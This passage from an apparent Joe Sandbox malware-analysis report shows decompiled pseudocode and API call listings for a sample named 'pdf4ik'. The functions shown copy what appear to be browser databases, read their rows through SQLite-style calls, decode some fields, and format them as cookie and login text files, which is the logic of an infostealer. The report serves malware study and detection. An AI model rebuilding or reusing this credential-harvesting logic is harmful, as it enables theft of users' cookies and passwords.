				CHAR* _t125;
				CHAR* _t128;
				void* _t129;
				void* _t131;
				CHAR* _t133;
				void* _t148;
				CHAR* _t151;
				void* _t154;
				intOrPtr _t157;
				void* _t158;
				CHAR* _t159;
				void* _t160;
				CHAR* _t161;
				intOrPtr _t165;
				CHAR* _t173;
				intOrPtr* _t178;
				intOrPtr _t182;
				intOrPtr _t187;
				CHAR* _t190;
				intOrPtr _t200;
				void* _t206;
				CHAR* _t207;
				void* _t208;
				CHAR* _t209;
				void* _t212;
				void* _t213;
				CHAR* _t214;
				intOrPtr _t215;
				CHAR* _t216;
				signed int _t217;
				void* _t218;
				void* _t219;
				void* _t222;
				void* _t224;
				void* _t225;
				void* _t228;
				void* _t230;

				_t219 = _t218 - 0x254;
				_t75 =  *0x29dd5664; // 0xd9555f04
				_t76 = _t75 ^ _t217;
				_v20 = _t76;
				 *[fs:0x0] =  &_v16;
				_t207 = _a12;
				_t159 = _a8;
				_v612 = __ecx;
				_t165 =  *0x29dd7e0c; // 0x15a1bd0
				_v588 = _a4;
				_v604 = __edx;
				_v608 = _a16;
				_t80 =  *0x29dd8550(_t207, _t165, _t76, _t206, _t212, _t158,  *[fs:0x0], E29DC32EB, 0xffffffff);
				_t231 = _t80;
				if(_t80 != 0) {
					_t189 =  *0x29dd7e34; // 0x15a1be0
					_t81 =  *0x29dd8550(_t207, _t189);
					__eflags = _t81;
					if(_t81 != 0) {
						_t82 =  *0x29dd8110; // 0x15a5048
						_t83 =  *0x29dd8550(_t159, _t82);
						__eflags = _t83;
						if(_t83 == 0) {
							goto L30;
						}
						goto L5;
					}
					_t159 = 0x29dcd617;
					goto L5;
				} else {
					_t159 = 0x29dcd617;
					L5:
					E29DB5640( &_v548, 0, 0x104);
					_t190 =  *0x29dd8098; // 0x15a1f98
					lstrcatA( &_v548, _t190);
					_t214 = E29DADFE0(_t190, _t207, _t212, 0x1a);
					 *_t214 = 0;
					E29DAFCE4(GetTickCount());
					_t222 = _t219 + 0x14;
					_v584 = 0x1a;
					do {
						_t91 = E29DAFCF6(_t231);
						asm("cdq");
						_push(_t91 % 0xa);
						_push(_t214);
						wsprintfA(_t214, "%s%d");
						_t222 = _t222 + 0x10;
						_t18 =  &_v584;
						 *_t18 = _v584 - 1;
					} while ( *_t18 != 0);
					_t214[0x1a] = 0;
					lstrcatA( &_v548, _t214);
					CopyFileA(_v588,  &_v548, 1);
					E29DB5640( &_v284, 0, 0x104);
					lstrcatA( &_v284, "\\");
					_t173 =  *0x29dd8104; // 0x15a1a80
					lstrcatA( &_v284, _t173);
					lstrcatA( &_v284, "\\");
					lstrcatA( &_v284, _t207);
					lstrcatA( &_v284, "_");
					lstrcatA( &_v284, _t159);
					lstrcatA( &_v284, ".txt");
					_t215 =  *0x29dd7d94; // 0x159a8d0
					_t189 =  &_v592;
					_t109 =  *0x29dd8344( &_v548,  &_v592);
					_t224 = _t222 + 0x14;
					if(_t109 != 0) {
						L29:
						_t83 = DeleteFileA( &_v548);
						L30:
						 *[fs:0x0] = _v16;
						_pop(_t208);
						_pop(_t213);
						_pop(_t160);
						return E29DADF46(_t83, _t160, _v20 ^ _t217, _t189, _t208, _t213);
					}
					_t111 =  *0x29dd82f8(_v592, _t215, 0xffffffff,  &_v580, _t109);
					_t225 = _t224 + 0x14;
					if(_t111 != 0) {
						L28:
						 *0x29dd8318(_v580);
						_t189 = _v592;
						 *0x29dd8348(_v592);
						goto L29;
					}
					_t216 = HeapAlloc(GetProcessHeap(), _t111, 0xf423f);
					_t117 =  *0x29dd8314(_v580);
					_t225 = _t225 + 4;
					if(_t117 != 0x64) {
						L23:
						_t118 = lstrlenA(_t216);
						_t178 = _v608;
						if(_t178 != 0) {
							__eflags =  *_t178 - 2;
							if( *_t178 == 2) {
								 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t178 + 4)), _t216,  &_v284, _t118, 3);
							} else {
								 *0x29dd8814 = 0x80000;
							}
						} else {
							 *0x29dd8814 = 0x10000;
						}
						goto L28;
					} else {
						goto L10;
					}
					do {
						L10:
						_t121 =  *0x29dd8334(_v580, 0);
						_v588 = _t121;
						_t161 =  *0x29dd8334(_v580, 1);
						_t124 =  *0x29dd8334(_v580, 2);
						_v600 = _t124;
						_t125 =  *0x29dd8334(_v580, 3);
						_t209 = _t125;
						_v584 =  *0x29dd8334(_v580, 4);
						_t128 =  *0x29dd8334(_v580, 5);
						_t228 = _t225 + 0x30;
						_v596 = _t128;
						_t129 =  *0x29dd8550(_t161, "0");
						 *_t161 = 0;
						if(_t129 != 0) {
							_t200 =  *0x29dd820c; // 0x15a1930
							_push(_t200);
						} else {
							_t187 =  *0x29dd7dec; // 0x15a1a90
							_push(_t187);
						}
						lstrcatA(_t161, ??);
						_t131 =  *0x29dd8550(_t209, "0");
						 *_t209 = 0;
						if(_t131 != 0) {
							_t182 =  *0x29dd820c; // 0x15a1930
							_push(_t182);
						} else {
							_t157 =  *0x29dd7dec; // 0x15a1a90
							_push(_t157);
						}
						lstrcatA(_t209, ??);
						_t133 = _v584;
						if( *_t133 == 0x2d) {
							 *_t133 = 0;
							lstrcatA(_t133, "0");
						}
						lstrcatA(_t216, _v588);
						lstrcatA(_t216, "\t");
						lstrcatA(_t216, _t161);
						lstrcatA(_t216, "\t");
						lstrcatA(_t216, _v600);
						lstrcatA(_t216, "\t");
						lstrcatA(_t216, _t209);
						lstrcatA(_t216, "\t");
						lstrcatA(_t216, _v584);
						lstrcatA(_t216, "\t");
						lstrcatA(_t216, _v596);
						lstrcatA(_t216, "\t");
						_t148 =  *0x29dd8320(_v580, 6, _v612, _v604);
						_t151 = E29D99510( &_v576,  *0x29dd8328(), _t148, _v580, 6);
						_t230 = _t228 + 0x18;
						_v8 = 0;
						if(_t151[0x14] >= 0x10) {
							_t151 =  *_t151;
						}
						lstrcatA(_t216, _t151);
						_v8 = 0xffffffff;
						if(_v556 >= 0x10) {
							_push(_v576);
							E29DADF3B();
							_t230 = _t230 + 4;
						}
						_v556 = 0xf;
						_v560 = 0;
						_v576 = 0;
						lstrcatA(_t216, "\n");
						_t154 =  *0x29dd8314(_v580);
						_t225 = _t230 + 4;
					} while (_t154 == 0x64);
					goto L23;
				}
			}









































































                                        0x29d99a91
                                        0x29d99a97
                                        0x29d99a9c
                                        0x29d99a9e
                                        0x29d99aa8
                                        0x29d99ab1
                                        0x29d99ab4
                                        0x29d99ab7
                                        0x29d99abd
                                        0x29d99ac3
                                        0x29d99ace
                                        0x29d99ad4
                                        0x29d99ada
                                        0x29d99ae0
                                        0x29d99ae2
                                        0x29d99aeb
                                        0x29d99af3
                                        0x29d99af9
                                        0x29d99afb
                                        0x29d99b04
                                        0x29d99b0b
                                        0x29d99b11
                                        0x29d99b13
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d99b13
                                        0x29d99afd
                                        0x00000000
                                        0x29d99ae4
                                        0x29d99ae4
                                        0x29d99b19
                                        0x29d99b27
                                        0x29d99b2c
                                        0x29d99b3d
                                        0x29d99b4a
                                        0x29d99b4f
                                        0x29d99b59
                                        0x29d99b5e
                                        0x29d99b61
                                        0x29d99b70
                                        0x29d99b70
                                        0x29d99b75
                                        0x29d99b7d
                                        0x29d99b7e
                                        0x29d99b85
                                        0x29d99b8b
                                        0x29d99b8e
                                        0x29d99b8e
                                        0x29d99b8e
                                        0x29d99b9e
                                        0x29d99ba2
                                        0x29d99bb8
                                        0x29d99bcc
                                        0x29d99be0
                                        0x29d99be6
                                        0x29d99bf4
                                        0x29d99c06
                                        0x29d99c14
                                        0x29d99c26
                                        0x29d99c34
                                        0x29d99c46
                                        0x29d99c4c
                                        0x29d99c52
                                        0x29d99c60
                                        0x29d99c66
                                        0x29d99c6b
                                        0x29d99f5d
                                        0x29d99f64
                                        0x29d99f6a
                                        0x29d99f6d
                                        0x29d99f75
                                        0x29d99f76
                                        0x29d99f77
                                        0x29d99f85
                                        0x29d99f85
                                        0x29d99c83
                                        0x29d99c89
                                        0x29d99c8e
                                        0x29d99f3d
                                        0x29d99f44
                                        0x29d99f4a
                                        0x29d99f54
                                        0x00000000
                                        0x29d99f5a
                                        0x29d99ca7
                                        0x29d99cb0
                                        0x29d99cb6
                                        0x29d99cbc
                                        0x29d99ef6
                                        0x29d99ef7
                                        0x29d99efd
                                        0x29d99f05
                                        0x29d99f13
                                        0x29d99f16
                                        0x29d99f38
                                        0x29d99f18
                                        0x29d99f18
                                        0x29d99f18
                                        0x29d99f07
                                        0x29d99f07
                                        0x29d99f07
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d99cc2
                                        0x29d99cc2
                                        0x29d99ccb
                                        0x29d99cda
                                        0x29d99ce6
                                        0x29d99cf1
                                        0x29d99d00
                                        0x29d99d06
                                        0x29d99d15
                                        0x29d99d1d
                                        0x29d99d2c
                                        0x29d99d32
                                        0x29d99d3b
                                        0x29d99d41
                                        0x29d99d47
                                        0x29d99d4f
                                        0x29d99d5a
                                        0x29d99d60
                                        0x29d99d51
                                        0x29d99d51
                                        0x29d99d57
                                        0x29d99d57
                                        0x29d99d62
                                        0x29d99d6e
                                        0x29d99d74
                                        0x29d99d7c
                                        0x29d99d86
                                        0x29d99d8c
                                        0x29d99d7e
                                        0x29d99d7e
                                        0x29d99d83
                                        0x29d99d83
                                        0x29d99d8e
                                        0x29d99d94
                                        0x29d99d9d
                                        0x29d99da5
                                        0x29d99dab
                                        0x29d99dab
                                        0x29d99db9
                                        0x29d99dc5
                                        0x29d99dcd
                                        0x29d99dd9
                                        0x29d99de7
                                        0x29d99df3
                                        0x29d99dfb
                                        0x29d99e07
                                        0x29d99e15
                                        0x29d99e21
                                        0x29d99e2f
                                        0x29d99e3b
                                        0x29d99e58
                                        0x29d99e7c
                                        0x29d99e81
                                        0x29d99e8b
                                        0x29d99e91
                                        0x29d99e93
                                        0x29d99e93
                                        0x29d99e97
                                        0x29d99e9d
                                        0x29d99eaa
                                        0x29d99eb2
                                        0x29d99eb3
                                        0x29d99eb8
                                        0x29d99eb8
                                        0x29d99ec1
                                        0x29d99ecb
                                        0x29d99ed1
                                        0x29d99ed7
                                        0x29d99ee4
                                        0x29d99eea
                                        0x29d99eed
                                        0x00000000
                                        0x29d99cc2

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$_memset$CopyCountFileTick_malloc_randwsprintf
                                        • String ID: %s%d$.txt
                                        • API String ID: 4014965780-2508900824
                                        • Opcode ID: 1366646bc55f11f2d188b65b0271ddb83259f345184d9c3d96d2e09baebb1360
                                        • Instruction ID: 55afe4f97dcf24389b34434e45d1d1426d2293164ee6c0c634c6145c4332e30c
                                        • Opcode Fuzzy Hash: 1366646bc55f11f2d188b65b0271ddb83259f345184d9c3d96d2e09baebb1360
                                        • Instruction Fuzzy Hash: EED15EB2941254ABD711AFA4DC88F9EB7B8FF59B01F048199F509D3240EB389A45EF70
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9ACA0 Relevance: 73.8, APIs: 38, Strings: 4, Instructions: 277stringmemoryfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 52%
                                        			E29D9ACA0(CHAR* __ecx, intOrPtr* __edx, void* __eflags, CHAR* _a4, CHAR* _a8) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v544;
				CHAR* _v548;
				CHAR* _v552;
				char _v556;
				CHAR* _v560;
				CHAR* _v564;
				intOrPtr* _v568;
				CHAR* _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t65;
				CHAR* _t73;
				void* _t83;
				long _t88;
				CHAR* _t92;
				void* _t93;
				int _t94;
				CHAR* _t99;
				CHAR* _t100;
				CHAR* _t103;
				CHAR* _t104;
				CHAR* _t105;
				void* _t106;
				void* _t108;
				void* _t126;
				CHAR* _t127;
				CHAR* _t129;
				intOrPtr* _t140;
				void* _t161;
				CHAR* _t162;
				void* _t163;
				CHAR* _t164;
				CHAR* _t165;
				signed int _t166;
				void* _t167;
				void* _t170;
				void* _t172;
				void* _t173;
				void* _t176;
				void* _t177;

				_t177 = __eflags;
				_t56 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t56 ^ _t166;
				_t127 = _a4;
				_v552 = _a8;
				_v548 = __ecx;
				_v568 = __edx;
				E29DB5640( &_v540, 0, 0x104);
				_t129 =  *0x29dd8098; // 0x15a1f98
				lstrcatA( &_v540, _t129);
				_t164 = E29DADFE0( &_v540, _t161, _t163, 0x1a);
				 *_t164 = 0;
				E29DAFCE4(GetTickCount());
				_t170 = _t167 + 0x14;
				_t162 = 0x1a;
				do {
					_t65 = E29DAFCF6(_t177);
					asm("cdq");
					_push(_t65 % 0xa);
					_push(_t164);
					wsprintfA(_t164, "%s%d");
					_t170 = _t170 + 0x10;
					_t162 = _t162 - 1;
				} while (_t162 != 0);
				_t164[0x1a] = 0;
				lstrcatA( &_v540, _t164);
				CopyFileA(_t127,  &_v540, 1);
				E29DB5640( &_v276, _t162, 0x104);
				lstrcatA( &_v276, "\\");
				_t73 =  *0x29dd8104; // 0x15a1a80
				lstrcatA( &_v276, _t73);
				lstrcatA( &_v276, "\\");
				lstrcatA( &_v276, _v548);
				lstrcatA( &_v276, "_");
				lstrcatA( &_v276, _v552);
				_t153 =  &_v276;
				lstrcatA( &_v276, ".txt");
				_t165 =  *0x29dd7c24; // 0x158ef60
				_t83 =  *0x29dd8344( &_v540,  &_v556);
				_t172 = _t170 + 0x14;
				if(_t83 != 0) {
					L18:
					return E29DADF46(DeleteFileA( &_v540), _t127, _v8 ^ _t166, _t153, _t162, _t165);
				}
				_t88 =  *0x29dd82f8(_v556, _t165, 0xffffffff,  &_v544, _t83);
				_t173 = _t172 + 0x14;
				if(_t88 != 0) {
					L17:
					 *0x29dd8318(_v544);
					_t153 = _v556;
					 *0x29dd8348(_v556);
					goto L18;
				}
				_t92 = HeapAlloc(GetProcessHeap(), _t88, 0xf423f);
				_t165 = _t92;
				_t93 =  *0x29dd8314(_v544);
				_t173 = _t173 + 4;
				if(_t93 != 0x64) {
					L12:
					_t94 = lstrlenA(_t165);
					_t140 = _v568;
					if(_t140 != 0) {
						__eflags =  *_t140 - 2;
						if( *_t140 == 2) {
							 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t140 + 4)), _t165,  &_v276, _t94, 3);
						} else {
							 *0x29dd8814 = 0x80000;
						}
					} else {
						 *0x29dd8814 = 0x10000;
					}
					goto L17;
				} else {
					goto L5;
				}
				do {
					L5:
					_v552 =  *0x29dd8334(_v544, 0);
					_t99 =  *0x29dd8334(_v544, 1);
					_t162 = _t99;
					_t100 =  *0x29dd8334(_v544, 2);
					_v548 = _t100;
					_t127 =  *0x29dd8334(_v544, 3);
					_t103 =  *0x29dd8334(_v544, 4);
					_v560 = _t103;
					_t104 =  *0x29dd8334(_v544, 5);
					_v564 = _t104;
					_t105 =  *0x29dd8334(_v544, 6);
					_t176 = _t173 + 0x38;
					_v572 = _t105;
					_t106 =  *0x29dd8550(_t162, "0");
					 *_t162 = 0;
					if(_t106 != 0) {
						_push("FALSE");
					} else {
						_push("TRUE");
					}
					lstrcatA(_t162, ??);
					_t108 =  *0x29dd8550(_t127, "0");
					 *_t127 = 0;
					if(_t108 != 0) {
						_push("FALSE");
					} else {
						_push("TRUE");
					}
					lstrcatA(_t127, ??);
					lstrcatA(_t165, _v552);
					lstrcatA(_t165, "\t");
					lstrcatA(_t165, _t162);
					lstrcatA(_t165, "\t");
					lstrcatA(_t165, _v548);
					lstrcatA(_t165, "\t");
					lstrcatA(_t165, _t127);
					lstrcatA(_t165, "\t");
					lstrcatA(_t165, _v560);
					lstrcatA(_t165, "\t");
					lstrcatA(_t165, _v564);
					lstrcatA(_t165, "\t");
					lstrcatA(_t165, _v572);
					lstrcatA(_t165, "\n");
					_t126 =  *0x29dd8314(_v544);
					_t173 = _t176 + 4;
				} while (_t126 == 0x64);
				goto L12;
			}
















































                                        0x29d9aca0
                                        0x29d9aca9
                                        0x29d9acb0
                                        0x29d9acb7
                                        0x29d9acc1
                                        0x29d9acd0
                                        0x29d9acd6
                                        0x29d9acdc
                                        0x29d9ace1
                                        0x29d9acf2
                                        0x29d9acff
                                        0x29d9ad04
                                        0x29d9ad0e
                                        0x29d9ad13
                                        0x29d9ad16
                                        0x29d9ad20
                                        0x29d9ad20
                                        0x29d9ad25
                                        0x29d9ad2d
                                        0x29d9ad2e
                                        0x29d9ad35
                                        0x29d9ad3b
                                        0x29d9ad3e
                                        0x29d9ad3e
                                        0x29d9ad49
                                        0x29d9ad4d
                                        0x29d9ad5d
                                        0x29d9ad70
                                        0x29d9ad84
                                        0x29d9ad8a
                                        0x29d9ad97
                                        0x29d9ada9
                                        0x29d9adbd
                                        0x29d9adcf
                                        0x29d9ade3
                                        0x29d9adee
                                        0x29d9adf5
                                        0x29d9adfb
                                        0x29d9ae0f
                                        0x29d9ae15
                                        0x29d9ae1a
                                        0x29d9b07b
                                        0x29d9b098
                                        0x29d9b098
                                        0x29d9ae32
                                        0x29d9ae38
                                        0x29d9ae3d
                                        0x29d9b05b
                                        0x29d9b062
                                        0x29d9b068
                                        0x29d9b072
                                        0x00000000
                                        0x29d9b078
                                        0x29d9ae50
                                        0x29d9ae5d
                                        0x29d9ae5f
                                        0x29d9ae65
                                        0x29d9ae6b
                                        0x29d9b014
                                        0x29d9b015
                                        0x29d9b01b
                                        0x29d9b023
                                        0x29d9b031
                                        0x29d9b034
                                        0x29d9b056
                                        0x29d9b036
                                        0x29d9b036
                                        0x29d9b036
                                        0x29d9b025
                                        0x29d9b025
                                        0x29d9b025
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d9ae71
                                        0x29d9ae71
                                        0x29d9ae80
                                        0x29d9ae8f
                                        0x29d9ae9e
                                        0x29d9aea0
                                        0x29d9aeaf
                                        0x29d9aebb
                                        0x29d9aec6
                                        0x29d9aed5
                                        0x29d9aedb
                                        0x29d9aeea
                                        0x29d9aef0
                                        0x29d9aef6
                                        0x29d9aeff
                                        0x29d9af05
                                        0x29d9af0b
                                        0x29d9af13
                                        0x29d9af1c
                                        0x29d9af15
                                        0x29d9af15
                                        0x29d9af15
                                        0x29d9af22
                                        0x29d9af2e
                                        0x29d9af34
                                        0x29d9af3c
                                        0x29d9af45
                                        0x29d9af3e
                                        0x29d9af3e
                                        0x29d9af3e
                                        0x29d9af4b
                                        0x29d9af59
                                        0x29d9af65
                                        0x29d9af6d
                                        0x29d9af79
                                        0x29d9af87
                                        0x29d9af93
                                        0x29d9af9b
                                        0x29d9afa7
                                        0x29d9afb5
                                        0x29d9afc1
                                        0x29d9afcf
                                        0x29d9afdb
                                        0x29d9afe9
                                        0x29d9aff5
                                        0x29d9b002
                                        0x29d9b008
                                        0x29d9b00b
                                        0x00000000

                                        APIs
                                        • _memset.LIBCMT ref: 29D9ACDC
                                        • lstrcatA.KERNEL32(?,015A1F98,?,?,29DCD617), ref: 29D9ACF2
                                        • _malloc.LIBCMT ref: 29D9ACFA
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D9AD07
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D9AD20
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D9AD35
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9AD4D
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9AD5D
                                        • _memset.LIBCMT ref: 29D9AD70
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9AD84
                                        • lstrcatA.KERNEL32(?,015A1A80,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9AD97
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADA9
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADBD
                                        • lstrcatA.KERNEL32(?,29DCFF1C,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADCF
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADE3
                                        • lstrcatA.KERNEL32(?,.txt,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADF5
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9AE49
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D9AE50
                                        • StrCmpCA.SHLWAPI(00000000,29DCFF20), ref: 29D9AF05
                                        • lstrcatA.KERNEL32(00000000,FALSE), ref: 29D9AF22
                                        • StrCmpCA.SHLWAPI(00000000,29DCFF20), ref: 29D9AF2E
                                        • lstrcatA.KERNEL32(00000000,FALSE), ref: 29D9AF4B
                                        • lstrcatA.KERNEL32(00000000,?), ref: 29D9AF59
                                        • lstrcatA.KERNEL32(00000000,29DCFF24), ref: 29D9AF65
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9AF6D
                                        • lstrcatA.KERNEL32(00000000,29DCFF24), ref: 29D9AF79
                                        • lstrcatA.KERNEL32(00000000,?), ref: 29D9AF87
                                        • lstrcatA.KERNEL32(00000000,29DCFF24), ref: 29D9AF93
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9AF9B
                                        • lstrcatA.KERNEL32(00000000,29DCFF24), ref: 29D9AFA7
                                        • lstrcatA.KERNEL32(00000000,?), ref: 29D9AFB5
                                        • lstrcatA.KERNEL32(00000000,29DCFF24), ref: 29D9AFC1
                                        • lstrcatA.KERNEL32(00000000,?), ref: 29D9AFCF
                                        • lstrcatA.KERNEL32(00000000,29DCFF24), ref: 29D9AFDB
                                        • lstrcatA.KERNEL32(00000000,?), ref: 29D9AFE9
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9AFF5
                                        • lstrlenA.KERNEL32(00000000), ref: 29D9B015
                                        • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9B082
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$File__getptd_memset$AllocAllocateCopyCountDeleteProcessTick_malloc_randlstrlenwsprintf
                                        • String ID: %s%d$.txt$FALSE$TRUE
                                        • API String ID: 1707634767-1330936189
                                        • Opcode ID: f5796510cbf98473105470ec2af972865b2069291ee585f3c6ff5de481aac5a9
                                        • Instruction ID: 2c8fe063cbba89a2dbb09abb55e5a24ea77d3dc1455ca6b271e43520f3fd3d27
                                        • Opcode Fuzzy Hash: f5796510cbf98473105470ec2af972865b2069291ee585f3c6ff5de481aac5a9
                                        • Instruction Fuzzy Hash: F0A160B2981258ABC712ABA4DC8CFDE77B8EF5D701F00859CF509D2240DB789A45AF71
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D99680 Relevance: 68.5, APIs: 38, Strings: 1, Instructions: 276stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 49%
                                        			E29D99680(CHAR* __ecx, CHAR* __edx, CHAR* __esi, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				CHAR* _v8;
				char _v16;
				signed int _v20;
				char _v284;
				intOrPtr _v292;
				CHAR* _v296;
				CHAR* _v312;
				char _v316;
				CHAR* _v320;
				char _v324;
				CHAR* _v328;
				CHAR* _v332;
				intOrPtr _v336;
				void* __ebx;
				void* __edi;
				signed int _t58;
				signed int _t59;
				signed int _t69;
				void* _t76;
				int _t77;
				void* _t79;
				void* _t84;
				CHAR* _t85;
				void* _t88;
				CHAR** _t92;
				CHAR* _t109;
				void* _t112;
				CHAR* _t126;
				CHAR* _t131;
				void* _t132;
				CHAR* _t150;
				CHAR* _t152;
				CHAR* _t153;
				intOrPtr _t154;
				CHAR* _t156;
				CHAR* _t164;
				CHAR* _t165;
				intOrPtr _t166;
				void* _t169;
				void* _t170;
				intOrPtr _t171;
				void* _t172;
				CHAR* _t173;
				CHAR* _t174;
				signed int _t175;
				void* _t176;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t187;
				signed int _t188;

				_t174 = __esi;
				_push(0xffffffff);
				_push(E29DC21EB);
				_push( *[fs:0x0]);
				_t58 =  *0x29dd5664; // 0xd9555f04
				_t59 = _t58 ^ _t175;
				_t188 = _t59;
				_v20 = _t59;
				_push(_t169);
				_push(_t59);
				 *[fs:0x0] =  &_v16;
				_v320 = __ecx;
				_v332 = _a4;
				_v328 = __edx;
				_v336 = _a12;
				E29DB5640( &_v284, 0, 0x104);
				_t156 =  *0x29dd8098; // 0x15a1f98
				lstrcatA( &_v284, _t156);
				_t131 = E29DADFE0(_t156, _t169, __esi, 0x1a);
				 *_t131 = 0;
				E29DAFCE4(GetTickCount());
				_t180 = _t176 - 0x144 + 0x14;
				_t170 = 0x1a;
				do {
					_t69 = E29DAFCF6(_t188);
					asm("cdq");
					_push(_t69 % 0xa);
					_push(_t131);
					wsprintfA(_t131, "%s%d");
					_t180 = _t180 + 0x10;
					_t170 = _t170 - 1;
				} while (_t170 != 0);
				_t131[0x1a] = 0;
				lstrcatA( &_v284, _t131);
				CopyFileA(_v320,  &_v284, 1);
				_t171 =  *0x29dd7e98; // 0x15920e8
				_t159 =  &_v324;
				_t76 =  *0x29dd8344( &_v284,  &_v324);
				_t181 = _t180 + 8;
				if(_t76 == 0) {
					_t79 =  *0x29dd82f8(_v324, _t171, 0xffffffff,  &_v316, _t76);
					_t182 = _t181 + 0x14;
					if(_t79 == 0) {
						_t84 =  *0x29dd8314(_v316);
						_t182 = _t182 + 4;
						if(_t84 == 0x64) {
							do {
								_t85 =  *0x29dd8334(_v316, 0);
								_v320 = _t85;
								_t173 =  *0x29dd8334(_v316, 1);
								_t88 =  *0x29dd8320(_v316, 2, _a8, _v336);
								E29D99510( &_v312,  *0x29dd8328(), _t88, _v316, 2);
								_t187 = _t182 + 0x28;
								_v8 = 0;
								_t92 = _v312;
								if(_v292 < 0x10) {
									_t92 =  &_v312;
								}
								_push(0x29dcd617);
								_push(_t92);
								if( *0x29dd8550() != 0) {
									lstrcatA(_t174, "\n");
									_t164 =  *0x29dd7ed8; // 0x15a1a00
									lstrcatA(_t174, _t164);
									lstrcatA(_t174, _v328);
									lstrcatA(_t174, " [");
									lstrcatA(_t174, _v332);
									lstrcatA(_t174, "]\n");
									_t165 =  *0x29dd81e0; // 0x15a1a10
									lstrcatA(_t174, _t165);
									lstrcatA(_t174, _v320);
									lstrcatA(_t174, "\n");
									_t150 =  *0x29dd7c9c; // 0x15a1a20
									lstrcatA(_t174, _t150);
									lstrcatA(_t174, _t173);
									lstrcatA(_t174, "\n");
									_t166 =  *0x29dd819c; // 0x15a4b68
									_push(_t166);
									goto L11;
								} else {
									_push(0x29dcd617);
									_push(_t173);
									if( *0x29dd8550() != 0) {
										lstrcatA(_t174, "\n");
										_t152 =  *0x29dd7ed8; // 0x15a1a00
										lstrcatA(_t174, _t152);
										lstrcatA(_t174, _v328);
										lstrcatA(_t174, " [");
										lstrcatA(_t174, _v332);
										lstrcatA(_t174, "]\n");
										_t153 =  *0x29dd81e0; // 0x15a1a10
										lstrcatA(_t174, _t153);
										lstrcatA(_t174, _v320);
										lstrcatA(_t174, "\n");
										_t126 =  *0x29dd7c9c; // 0x15a1a20
										lstrcatA(_t174, _t126);
										lstrcatA(_t174, _t173);
										lstrcatA(_t174, "\n");
										_t154 =  *0x29dd819c; // 0x15a4b68
										_push(_t154);
										L11:
										lstrcatA(_t174, ??);
										_t109 = _v312;
										if(_v292 < 0x10) {
											_t109 =  &_v312;
										}
										lstrcatA(_t174, _t109);
										lstrcatA(_t174, "\n\n");
									}
								}
								_v8 = 0xffffffff;
								if(_v292 >= 0x10) {
									_push(_v312);
									E29DADF3B();
									_t187 = _t187 + 4;
								}
								_v292 = 0xf;
								_v296 = 0;
								_v312 = 0;
								_t112 =  *0x29dd8314(_v316);
								_t182 = _t187 + 4;
							} while (_t112 == 0x64);
						}
					}
					_t159 = _v316;
					 *0x29dd8318(_v316);
					 *0x29dd8348(_v324);
				}
				_t77 = DeleteFileA( &_v284);
				 *[fs:0x0] = _v16;
				_pop(_t172);
				_pop(_t132);
				return E29DADF46(_t77, _t132, _v20 ^ _t175, _t159, _t172, _t174);
			}






















































                                        0x29d99680
                                        0x29d99683
                                        0x29d99685
                                        0x29d99690
                                        0x29d99697
                                        0x29d9969c
                                        0x29d9969c
                                        0x29d9969e
                                        0x29d996a2
                                        0x29d996a3
                                        0x29d996a7
                                        0x29d996b5
                                        0x29d996bb
                                        0x29d996cd
                                        0x29d996d3
                                        0x29d996d9
                                        0x29d996de
                                        0x29d996ef
                                        0x29d996fc
